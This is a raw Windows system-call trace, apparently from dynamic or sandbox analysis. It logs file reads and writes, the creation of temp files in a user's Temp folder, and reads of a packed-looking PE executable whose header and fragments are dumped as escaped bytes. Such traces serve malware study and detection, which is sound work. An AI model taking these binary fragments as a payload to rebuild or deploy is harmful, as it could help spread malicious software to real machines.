\xe1\xa3O\xc3\xaa-P5\xef3U\xf3\xeb:\x12r\xc0\x13\xfd\xfe\xfe\xf7\xf6\xcb\x0eZFo\x1b\x7f\xe9}t\x91\xfd,\x12\xcd\xe7\x8d?\xe9\xf6\xc8\x0f\xe0l\x8e\xb7\xaeS\xd9I4\x8846\xb8\x9c\x11x]S\xd9H\xd8\x97\x81\x03&\x9c\xb4\x9e\xb08\x93\xac"gl\x9d\x89\x88 g\xdf\x88\xa4\xf3\xa2\x88&?}\x88\xed\xa3T\x88\x05\xe9]\x97Tl\x19\x9cc,3 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtWriteFile |
Buffer =>
\xf9pu\xff\x87\x8f\x81
\xea\xae\xdc\xf5\xd5\xae\xa8\xf5#\xba:
\xe1\x9a\xf5\x08#\xbb\xf5XQ\x8b\x95\xbez\x87\xaa\xe9\x8e'\xaa\xe9\x85\x0e\x15A\x85y\xaa\xe9\x84\x7fq\x04*m\xc3\xbf\xf3\xafe\xc3\xc2\xc6D\x18\x06\x90{O\xf9\x12\xab\x96\xd0K\xb4\xe7\x13m\xab\xd2(\xdckZ=}{O\xf8Ny\x85\xa5h\x83\xfa1\xda\xd7\xe74og@\xf6\xf1\xbc\xad\xcfal\x12\xf4\xbc\xbc\xad\xce(l \xfc\x0fg@^\x8d\xa0\x0c\x14\xab\xf4\x11\xc1cD\xb6\xa6\x94[\x03\xa0;\xf6
\xe1\xa3O\xc3\xaa-P5\xef3U\xf3\xeb:\x12r\xc0\x13\xfd\xfe\xfe\xf7\xf6\xcb\x0eZFo\x1b\x7f\xe9}t\x91\xfd,\x12\xcd\xe7\x8d?\xe9\xf6\xc8\x0f\xe0l\x8e\xb7\xaeS\xd9I4\x8846\xb8\x9c\x11x]S\xd9H\xd8\x97\x81\x03&\x9c\xb4\x9e\xb08\x93\xac"gl\x9d\x89\x88 g\xdf\x88\xa4\xf3\xa2\x88&?}\x88\xed\xa3T\x88\x05\xe9]\x97Tl\x19\x9cc,3 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtReadFile |
Buffer => \xa2\x92`<\x19\xa3\x8e\x99M6Y(F(\xa2]Y\x9d\xd1W\x9d\xc5\x9fC\x9d\xc5\x9e\xc8\xf6\x8fe\xf9\xc3\xccV\xbb,cHg\x97\xd8\x8d\x9c\xfc\x9b\xa8J\xfc\x9b\xa8A\xfc\x9b\xa9/8\xc3\xe7s\xfc\x9b\xa9OX\xc6y_\xa3\xc9\xc8\x1f\xbc|[\xd3\x0c\xdbw\xe9g\x91\x86-\xb7\xaf\x14\xd4\xa8\xb2j\x9d\x0c\xdbZ\x06\x85\xd8\xc8(j\x14\xf6\xe1~\xd7|\x1d; \xa9^p;7Yjb=:j|\xf57~\xd7y\x93 >_\xfd\xd0\xe6\xc7\xf2\xcf\x02\xf1m\xd0A\xbc@\xdb1\xee\x9f\x1fi\xa0v\xc4\x87\xda\xbe\xd05`\x8d\xe4\x9d\xcaL\x14\xa4;\xc9\x84\xe4\x914\xb0\x805c\x03\xcb\xd8\x1e\xdb\xca5\xca\x84\xe4\x90\xc4\x0b\xf4\xb7m\x8eN\xd9\xe1\xd8O\x85v~-gA\xdaS\xd2\xd4\xdaZ4ha\xea\xe5D\xdaS\x0f@\xb1\x19'<\xc6w\xae\xa5\xf9 P\xd1"\xcd\xcax"\xcdj\xe96\xf4L\x07\xa6\x0e\xf5G)\xb8Xm)\x9aZ\xce FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtWriteFile |
Buffer => \xa2\x92`<\x19\xa3\x8e\x99M6Y(F(\xa2]Y\x9d\xd1W\x9d\xc5\x9fC\x9d\xc5\x9e\xc8\xf6\x8fe\xf9\xc3\xccV\xbb,cHg\x97\xd8\x8d\x9c\xfc\x9b\xa8J\xfc\x9b\xa8A\xfc\x9b\xa9/8\xc3\xe7s\xfc\x9b\xa9OX\xc6y_\xa3\xc9\xc8\x1f\xbc|[\xd3\x0c\xdbw\xe9g\x91\x86-\xb7\xaf\x14\xd4\xa8\xb2j\x9d\x0c\xdbZ\x06\x85\xd8\xc8(j\x14\xf6\xe1~\xd7|\x1d; \xa9^p;7Yjb=:j|\xf57~\xd7y\x93 >_\xfd\xd0\xe6\xc7\xf2\xcf\x02\xf1m\xd0A\xbc@\xdb1\xee\x9f\x1fi\xa0v\xc4\x87\xda\xbe\xd05`\x8d\xe4\x9d\xcaL\x14\xa4;\xc9\x84\xe4\x914\xb0\x805c\x03\xcb\xd8\x1e\xdb\xca5\xca\x84\xe4\x90\xc4\x0b\xf4\xb7m\x8eN\xd9\xe1\xd8O\x85v~-gA\xdaS\xd2\xd4\xdaZ4ha\xea\xe5D\xdaS\x0f@\xb1\x19'<\xc6w\xae\xa5\xf9 P\xd1"\xcd\xcax"\xcdj\xe96\xf4L\x07\xa6\x0e\xf5G)\xb8Xm)\x9aZ\xce FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtReadFile |
Buffer => )v\xc2\x81\xc6\x9b7\x07\x16!<v}k*k\x16!<8\xc6\xcc7\xea\x16!<z\xcd\xcc\xaes\x91%\x9ffj*.\xd2\xaera\x9b\xaera\x81\xc2\xca@\xb3\xe0~\xd3SaR\x19)\xaera\xc4A@\xd7\x1d\xa5\xfa\xd0z\xa5\xfa1\xd7\x15]\x06\x91\xa5\xfaT\xee\xa6<\xfad\xa5\xf9j=\xb1{-\x8eyP\xd2^F\x07-\xce\x96ex:\x9d\xea=\x95\x96\xb6\xfch\x89[\xe8F-M\xf9\xa8F\x07-\xc6\xc6\xacq\xb1=\xa3\xc5\x15"\x16\x9a\x8e=\xa3\xc09\xf9\xfb\x8fH\xf9\xfb\x8f\=\xa3\xc0\x9e"\x15\xfcy>\x1a\xeeV\x01M\x10\xaa\x01M\x10\xb8\x01M\x11%\xc5\x15Z\xe1\xda\xa0 q\x01M\x11\xd7\xda\xa0\x7f\xb1e\x9e\xa3a\x8a\xdd)\xca\x95\xf1\xd1\xfa\x9e\x91\x17\xad\x81'
\x92\x9e\x91\x17\x7f\x8a\x05\xbdu\x95\xa4\x8a\x00\x1c\xc0\xf3\xe1\xec\xfa\xd0>\xf3\x06\xe6^H\xddXB\xf3\x08\xc2N\xf8z\xe1L\xf8z\x11/\xe9#\x0cL FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtWriteFile |
Buffer => )v\xc2\x81\xc6\x9b7\x07\x16!<v}k*k\x16!<8\xc6\xcc7\xea\x16!<z\xcd\xcc\xaes\x91%\x9ffj*.\xd2\xaera\x9b\xaera\x81\xc2\xca@\xb3\xe0~\xd3SaR\x19)\xaera\xc4A@\xd7\x1d\xa5\xfa\xd0z\xa5\xfa1\xd7\x15]\x06\x91\xa5\xfaT\xee\xa6<\xfad\xa5\xf9j=\xb1{-\x8eyP\xd2^F\x07-\xce\x96ex:\x9d\xea=\x95\x96\xb6\xfch\x89[\xe8F-M\xf9\xa8F\x07-\xc6\xc6\xacq\xb1=\xa3\xc5\x15"\x16\x9a\x8e=\xa3\xc09\xf9\xfb\x8fH\xf9\xfb\x8f\=\xa3\xc0\x9e"\x15\xfcy>\x1a\xeeV\x01M\x10\xaa\x01M\x10\xb8\x01M\x11%\xc5\x15Z\xe1\xda\xa0 q\x01M\x11\xd7\xda\xa0\x7f\xb1e\x9e\xa3a\x8a\xdd)\xca\x95\xf1\xd1\xfa\x9e\x91\x17\xad\x81'
\x92\x9e\x91\x17\x7f\x8a\x05\xbdu\x95\xa4\x8a\x00\x1c\xc0\xf3\xe1\xec\xfa\xd0>\xf3\x06\xe6^H\xddXB\xf3\x08\xc2N\xf8z\xe1L\xf8z\x11/\xe9#\x0cL FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtReadFile |
Buffer => b$z\xa2]s\x85"\x92\x17\xf9N69\x97V\x99+\xce']s\x85/\x99+\xce\xa8\x86\x9e\xd1y-r<\x8c\xd6}\x88\x99\xc26\xce\xa5\x12%\xc3jS\xa7\x13\xc5\xc2\xd6\x01(\xd6}\x8dB\x12%\xc2\x02F\x93P\x83\xb6\xa9x\x9b\xa9\xfajj\xfd\xf6\x17U\xa9\x1fo\xe2\x12\x8e\xc1\xf7\xb3l\xafW\xa2)cu\xeal\xa0\x10\xbeq(\x89\x05R\xdd\x91\xbeq\x1d\xb3\x11c\x11]\xd5;_\xfb\xb9\x87U\xea\x05\xa9T\xea\x11\x93\x81u\xe4l~\xe5\xf5)H\xaa\xf5)f\x94\xea\x9c5\x19\xf5*S\xe1E\x8e\x10\xff\xea\x9c5\xdf\xc8\xb2\xdf\x99\xf7\xe5!\xe6'_.\xef\x9c\xaeHd,\x08\xd5_'w&\xf8'|*\')A\x1b\xe9%\x91\x8c
\x9f\xcc(\xbd1O\x12
\x9fu;\xd6rn\x08\x19\xa6r\x9b
\x9fUB
\x9c7\x87\xb2\x97\xc1"\x8d\xc0?\xd7\x8d\xc0<\xaf\xd6\xb8\xec\x91\x8d\xc0?\xc9B^\xa3\x04\x8d\xc0?\xd2I\x98u\x83 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtWriteFile |
Buffer => b$z\xa2]s\x85"\x92\x17\xf9N69\x97V\x99+\xce']s\x85/\x99+\xce\xa8\x86\x9e\xd1y-r<\x8c\xd6}\x88\x99\xc26\xce\xa5\x12%\xc3jS\xa7\x13\xc5\xc2\xd6\x01(\xd6}\x8dB\x12%\xc2\x02F\x93P\x83\xb6\xa9x\x9b\xa9\xfajj\xfd\xf6\x17U\xa9\x1fo\xe2\x12\x8e\xc1\xf7\xb3l\xafW\xa2)cu\xeal\xa0\x10\xbeq(\x89\x05R\xdd\x91\xbeq\x1d\xb3\x11c\x11]\xd5;_\xfb\xb9\x87U\xea\x05\xa9T\xea\x11\x93\x81u\xe4l~\xe5\xf5)H\xaa\xf5)f\x94\xea\x9c5\x19\xf5*S\xe1E\x8e\x10\xff\xea\x9c5\xdf\xc8\xb2\xdf\x99\xf7\xe5!\xe6'_.\xef\x9c\xaeHd,\x08\xd5_'w&\xf8'|*\')A\x1b\xe9%\x91\x8c
\x9f\xcc(\xbd1O\x12
\x9fu;\xd6rn\x08\x19\xa6r\x9b
\x9fUB
\x9c7\x87\xb2\x97\xc1"\x8d\xc0?\xd7\x8d\xc0<\xaf\xd6\xb8\xec\x91\x8d\xc0?\xc9B^\xa3\x04\x8d\xc0?\xd2I\x98u\x83 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtReadFile |
Buffer => \xaeX\xa8\xb6\xfaEA\xb0\x91\x0fW%^\x0bU\x12\x91\x0fWEUW\x19\xf3\xfaEaP\x91\x0f]^\xb3\x01`\x9bC\xc8\x00\xf1\\x7f\xf4mH\x0e\xd4\xceW\xbb$e\xe7\x1c\x96\x04W\xbb3\x82\xe7\x15\x06h\x99\xeaZI\xca\x05\x85\x97\xcd\xfe\xb5^b\xe5\xeeKi\xd9;\x91\xcd\xf7\xb6\x06\xa6\xbd\xa5\xb8\xa6\xbd\x8e\xe8\x91\xfb[\xfaa\xe0 \xd8\xc5\xef\xbc\xd1~\xb8%\x13uA!\x9e\xf1\x82\x01\xebd\x85\xa4\x0en%L\x9a FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtWriteFile |
Buffer => \xaeX\xa8\xb6\xfaEA\xb0\x91\x0fW%^\x0bU\x12\x91\x0fWEUW\x19\xf3\xfaEaP\x91\x0f]^\xb3\x01`\x9bC\xc8\x00\xf1\\x7f\xf4mH\x0e\xd4\xceW\xbb$e\xe7\x1c\x96\x04W\xbb3\x82\xe7\x15\x06h\x99\xeaZI\xca\x05\x85\x97\xcd\xfe\xb5^b\xe5\xeeKi\xd9;\x91\xcd\xf7\xb6\x06\xa6\xbd\xa5\xb8\xa6\xbd\x8e\xe8\x91\xfb[\xfaa\xe0 \xd8\xc5\xef\xbc\xd1~\xb8%\x13uA!\x9e\xf1\x82\x01\xebd\x85\xa4\x0en%L\x9a FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:45:03,005 | 1592 | NtCreateFile |
ShareAccess => 0 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp6.tmp DesiredAccess => 0x80100080 CreateDisposition => 2 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp5.tmp DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp6.tmp DesiredAccess => 0x40100080 CreateDisposition => 5 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtSetInformationFile |
FileHandle => 0x000001e0 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:45:03,025 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001d8 |
FAILURE | 3221225489 | |
| 07:45:03,025 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 07:45:03,025 | 504 | NtReadFile |
Buffer => ##Adobe File Version: 1.000
#
# Name: cp1258 to Unicode table
# Unicode version: 2.0
# Table version: 2.01
# Table format: Format A
# Date: 04/15/98
#
# Contact: cpxlate@microsoft.com
#
# General notes: no FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 07:45:03,055 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001d8 |
FAILURE | 3221225489 | |
| 07:45:03,055 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b8 FileInformation => |
FAILURE | 2147483654 | |
| 07:45:03,055 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00007000 BaseAddress => 0x00176000 |
SUCCESS | 0x00000000 | |
| 07:45:03,055 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000019c FileInformation => |
FAILURE | 2147483654 | |
| 07:45:03,055 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:45:03,055 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => |
FAILURE | 2147483654 | |
| 07:45:03,055 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:45:03,055 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:03,055 | 1592 | NtReadFile |
Buffer => MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4 \xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode.
$\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PE\x00\x00L\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x0f\x01\x0b\x01\x07\x00\x00`\x00\x00\x00\x10\x00\x00\x00\x80\x00\x00 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,055 | 1592 | NtReadFile |
Buffer => \xff\x87\xa8\x90\x00kernel32.d\xff\x9b\xe7\xdfll5root\IEFrame\x00ATV\xfe\xff\xfcH_Noterctrl_renwnd\x0f\xff\xb7\xff\xff|y_\xee\xcf\xb9\xdd\xdeg;\x84\x15\x80\xd4\x00\x1e8 \xb2\x9f\xfb\x15\x00\x8d\x06\x18x\xb6\xff\xff\xff\x0f@@\x03\x00\x1d+\xf4A\x81O\xcd\xfc\xff\xd7%k\x08\x00\x01@<\x8fS\x016@\xffn\xff\xdfT\xf1\xfd\xa73\xbb\xbd\x9aA\x14\x04W\x85\x0e\x06@]\x10\x00\x18\x04/\xb7\xdb\xdd@\x08\x1f\x00-
\x03y(\x07\xa4,\x8a\xdc\x02\x97\xbf\xfc\xe5\x00\xbe\x0e/\x1b\x00\x00\xbf\x06\xa78\x04\x00\x85/\x05\x13\xb7\xb7\xff\xf2\x01\x00\x15]\x8e_\xce\x0bDec\x00\xa3v\x00O\x9f\x00S\xdd\xbe\xfb\xdbep^ug\x00Jul\x03n\x00May\x0fprk\x97\xed\xcd\x07\x03Feb\x13aSa'\xdds\xb7\xed\x7fi\x00Thu FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,065 | 1592 | NtReadFile |
Buffer => e\xcf\x97\xe0 \xb7\xbf\xf5\xcd\xba\x04{$t|\xf3 $T},{\x0c{M\x07\xadf\xe0|m}\x1c \xf9U\xc4\xe0\xf6`m|\xa4\x02} \x8c\xd8\x02\x0e\x0c\x9d@\xd4|
1\xd6\x1a\x0ci\x18\x1d@ \x8b\x02\x97(.\xd9d \x94\xbc\x83?hm $A+rm b\xedo
\x9aXM){:|,}|\x01m\x83\xdf\x02\xa2t\x14 kTw%\x95h\x1d|\x19|\xda ,\x86_{\xef\xa0\x10t}{.|*)\x00}m\xad\xb5\xdb
\x01{W\x1f'\x88.d6\x13G\xa2<\xd0|f_\x05r\x9fh\xad\xdd\x0cei\x17u\x083s}\xdb]\xbb{i^|Y}\x1f\xdce{-Amm\x9bD{\xd0\x06\x93\x1c{!\xb0\xdd\xe0\x16BbeL|w\x08}n\xad\xb5\xf7\x05d\xaf\x06O\xe6\x1dla\xebZ\x8b\x0e\xb4|\x7f\x04\xf5m1\xd6\xa0\x15\xde\xde\x19\x08\x1b\xdbV\xe8h\xeeci|\xcf\x81m FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,065 | 1592 | NtReadFile |
Buffer => \xd4\x80l\x14\x85dW\xa9\xd4\xfeL$w{S\x17\xf9\xd2un\xb7] d [\xe5]|\x08i|\xeb\xc2\xbe\xafZ\x96-\x00 \xe4a\xb1\x1c\x07\x0cnrR\x9b\x1e\x98\xc5\\xfb\xda\xa7n\xfbfSm\x82\xb0=C\xac\x1a8P\xdf\xbdt\xb6\x1a\xc1fvMa\xa0c\x14k\x06\xae\xc6 \xb3\x93\xcd\x1e\xce\xf3R\x80g@.\xb7=Zk\x00\xb8\xeb1\k~\x0c\xda\xe3\x89\x0bh\x96\xaa\x89\xb9\x9c\x9b\x14TDFQ\xe2\xedSk1\xbe\xbd{>\x00 MA\xdc\xb6\xe8\xde\xef F{\xe2|\xfbM\x16$f^s}3s\x00 50$\xfb
_`{P\xea5R.\xb8RA5\x1a[\xd7\xd5\x88 D\x00_\xec\x034\xf7\x11U^
\x14|A\xfa\xcd\xe1\xc0\xc0R\xa3s\x11\x97\x01\x96\x1a\xcb\xbakgSf\xbc\xf7
,554 \xf1UI\xb5\xb6\xd0\x96\x8eo\xb8\x14xU \x89\xd6\x96\xd4MM\xa8\xc7\xc8\x1c\xe0\x0e\xcc\x10 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,065 | 1592 | NtReadFile |
Buffer => \x18nM\xe7\xe8\xd2R\xc1/l1o\xb6Ex\x0b\x94v`
D6.\xa9\xb26+|\xccu\x040\x003IMEO(4\xfb\xd0\xc8U\x89\x80PBy@\xb2\x9d\xa1\x01M\xce\x1e V9\x1d\xae\xb66\x01\x9bCB2-*\x94\xb6\xd6Ty\x94@mX\xd5\xb8m\x0b\x1b\xact/\xf3xG;! b\xed-\xbc\x1d\xee\x11y="N"1\x00\x0f4\xf4k\x05q-V\xcei\x801h\xce\x11kO\x18\xfcC\x07b\xad\x19h\x98j\x8b
1\x17\xd0\xa0a\x06\x85
7\xd6>1\xac\x9f
\x8b=_\x0b\x02>\xceO\xf7.3u\x0448X.\xe3N\xda\x8b\x99kP\x8cs6+\xb0\xf7f'\xbdI?G\xc1\xa9\x02\x94\xbaa\xcd\xff r\xb4V\x18/\xde\x18\x17\xb96s\xf0\x99\xd8\xcan\xcf\xc64\x8d
zZjf0E\x88lC\xdb\xa1o~Ab164"\xbd\xd7\xd4\xb8D\xfb@iQ\xb8\xda\x0b\xd8\xe9H\x84L\x8f: FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,065 | 1592 | NtReadFile |
Buffer => \xc8\xf4j\xf5a\x07\xf6v\x97\xcd\xc2f\xf7\xf8.\x8c\xf9\xfax\xfbe\xdfo\x1a
J\x07\x88\x8bE\x08\x8b=\x84\xd8\x8d~v\xe1\x7f@\x83\xc0\x04QP\x89\xb9\xff\xd7\xee\x89]\x089\x85\xf3\xe5\xd6\x02\\xd8\xfeu\x0eh\x18@\xdf\xa6{\x9f\x80\x0cP\x0e\x98|8\x9d!\x0f/\xd6\xcd\xdc\x84\xa9\x9f-&xV\x0cv\xd2\xf0\xfeI\x80<\x08\t\x0e\x19<\x90\x8d\xa3\xa6{v\xd8P+\xd6\x08j 6t(\xd8w\x0b\xdf\x80Ij\x02Sj\x034\x02\x7f\xd39\xd3\x1cp;\xc3t2\x83\xf8\xff|\x92\x1dv\xbaclph\x0cG:&4\x14\x10\x11d\xeb\x10\xdf\xee\xccd%`>u\x0f\xff\xfb\x83}\x08\x02\xb8\xc3\x9a\xe1\x0f\x8c\x19k\xcf u\xfd>\x9a\x91b,\x1f<5\x90W\xd6-<:w\xbfudP\x0b\xc4bi\x9a\xa5\xc7h\xc56\xc4\xc5\xc6\xa6i\x9a\xa6\xc7\xc8\xc9\xca\xcb\x9a\xa6i\x9a\xcc\xcd\xce\xcf\xd0\xd15M\xb3m\xd2s7\xd3\xd4 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,065 | 1592 | NtReadFile |
Buffer => \xc9\x08:\x02\x18AB\xeb\xedP\x01\x02/\xff\xe2\xf1
+\xc17'VW\x8b}\xf6\x89u/\xd0q\xe1\xf8\x80?I\x84H+S\xd6>&\x0f\xcc\xd2\xdd\xdc\x851
\x16\xfcF
##\xeey\xe2\x97\xf3F\x0f\xbe\x04>\xca\x11Y\\xdf\xda\xffo\x0e\x88D\x1d\xdcCF\x83\xfb\x0fr\xe2\x80d
%\xc98M\xdc\xf87\x13\xb7\x89\x7ft\x16\xc6/\x10@\x8d\x0c\x89\x808\xbcs\x05\xde\x1fLJ\xd0\x83\x17O;u\x01F\x19'~7\xde\x8e\xce\x00Tj\x14\xef\x99\xb7\x13M\xb8\xf8\xa2=\xba\x96 ]\x8e\x16\x8b\xdb\xdd\x88\x19\xeb\x16\x10%pD\xb9\xb5\xa5\x08\x90P
\x7f\xb8\x10\xee\x16\\xb7\xff\xdc\xb0\x8bB0\xfc +\xf3Pa\x07\xcf\xda\xae\xf4\xc4;\xf0\xedtQ+\xfe\xd9\xbf\xb5\x03\xf3\xee\x1c>\x8d4\x08\x03\xf7\x1a\x8b\xcf+\xcb;\xf3\xf5[\xbb\xd4\x8d\x15s\x1b\xf7\x85~+\x8b\xc3+o\x7f\xfb\xb6'\x03/\x8a\x143\x88\xadF;\xf1|\xf5\xeb FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,065 | 1592 | NtReadFile |
Buffer => \x94\xfc\x8e\xcd\xb1`\xc6\x02\xa5f\x01\xd7\xaf\xfd\x9d\\x85g\xa5%\xff?\x0bT\xf6\x8d\xc6\xbb\x12\x04|\xa6\xeb\x0biv|7\xff.\xa8\x99\xfeJ\xffN\x85\xf6\x7f\xf4\x80$\xf7@^t\x03\xf7\xfa\xc4\xad\xa9\x92\xa7\x1a\xe70P[\xcc\x10\xcex{F\xae\xc8\xf6\xb1u\xe8^\x1b(\x05Z\xe9\xaf\xa0j\x0cX
\xcb#p\xdbxk<\x02\xf4}\x079\xe9\x16+u\xbf\xd8\x85\xa1ESr\x8b\xdeP)&\x85\xc1n\xf0\x8b\xd8Y;\x17Y|\x1fs\x00\xd4m[\xdbF
\x03N\xd6\xc15\xf8\x08\x06n\xb3\x80\xeb(\xf4T\xe0\xeb\x03:\x8b\x0eXp/\xb5\xd2\xc9\x14\x01\xddx\x01\x19\xd8\\x10\xbd\xdc\xee\xa2|\xcd\x12a`\x7f \x8dC
\x1a\x14L\xd7\xde5\x9c\x02I\xdeRa\x12\xa1C\xe9\xe9C\x12\xd8\x05\xeb\xee\x0c\x83\xc3\x06\x0e\xe2
\xe4Cw[-a\x8fK\xc3W\xe8>\x7fa\xbe\x03\x03f\x80$\x80\xfa\xd01!@\xf7\xf6\xf8\x85\xff\xab\xect FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,065 | 1592 | NtReadFile |
Buffer => \x19-\xfbY\xfd\xd3\x04k\xc0X\x06\xf5\x9b\xfb\x95\xe5d\xe1:\xf9\x83z\xfftb\xd1\xfdv1.1-\x05\xe9 \xef\x8e\x0c\x0b\xa1\x04\xf9\xc3\x8b\xab\xa9mF\x17\xb6\xf8WH\x80\x03\x80\xea\xd0\xae\x85.@2<\xae\xba3Hm\x87tSg\x10^$\x01w\x90\xc1\x0f\x0c3\x8a\x0e\xd6\xf4m\x1c`\x15\xe2\x9dY\x13\x1fl[\xa3c{u\xc5\xbb,\xc0\x1c\x0c\xdb\xe2\x99\xcd0\x08\x1d\x17F27\\xe2\x96\x05u\xe3\xd9\x89\\xd9<<@\xb1\x92\xcb\xdet?(T\x14\xde\x7f\x15\xacwx\x97\x88\x04+CY<\x19\x16\xba\xc1J\xbdo@\x987\x8cTk\x89\xedzO\xf9\x04+\x017 \xdd\x83\x1f\xd8\xebP\xc4+@\x0f\xc2\xce\x16\xb2\x98\x15*\x85\x0b\xdd\x8e\xe4+\x06^+@\xdcK%\xdc\xb6\xd5y\xada+\x15\x8b\x83\xb3\xc0\xb67h\x11q\xf7\xeb>>\x06=g\x89#{\x13\x8a\x06<\x1b\xa6+j\xb2w\x89\x80\xe4t\x0f-\xcdY\xd7x
\xd0 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,065 | 1592 | NtReadFile |
Buffer => \xe2\xc4\xc7\x0f\xa7\x0ej\xc3\xe2-\xd8\xd9D=\xeb?W\x16\xddb\x18\xf0\x80f\x05\x00\x95\x1c\x01\x8a\xaf\x99\xb0K\xcf\x88\x06d\x84\xa1|\xb9\x88\xb5h\x1d$\x85\xd1e\xe8P\x93\xc8\x04yP\xa1\xb3$
x\xfe
P\x1f5\x0b\xb5<g,\x14c\xfe;7{\x13\xf2)\xfc\xfcl0\x12\xfef\xcf\xd9<-\xfc
\x1e\x17=\xfcY'\xdb\x16\x86I4\xff\xd7\xe4\xe0\xfe\xbaX8\xf2\x08\x16\x17\xce7\x04YH\x06\x8d\x8c<Zb\xd6\xb6\xad\xeb\x88\xb0\x84\xa9\xcdn\xf1\xeaey\x98\xf9!\x06F>\xcc\xa6\x1a\xaa\xf8,\x84\x8c2\xcc\x06\xc4.\x95\x1c\x14\xf7\xf6*>\xf5\xee\xbb\x8fbt'A;\xca|\xf4\x0bh\x83\xc0
`\xa4\xf8h-\x0c\x0c\xe7\xf4&d\xa8\x7f5R@j\x7fP\x10V\x80Pg\xce x-P\x9e\xef\xbe\xc3w!"Vc-t#Vh\x7fG\x0b\xee\xe7{\xb5\xb7\x9c\x83\xc5x\xf4\xfe\x94d\xc1\x158\xb8\xed\xfb\x10\xed+\x1a\xbe
FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,065 | 1592 | NtReadFile |
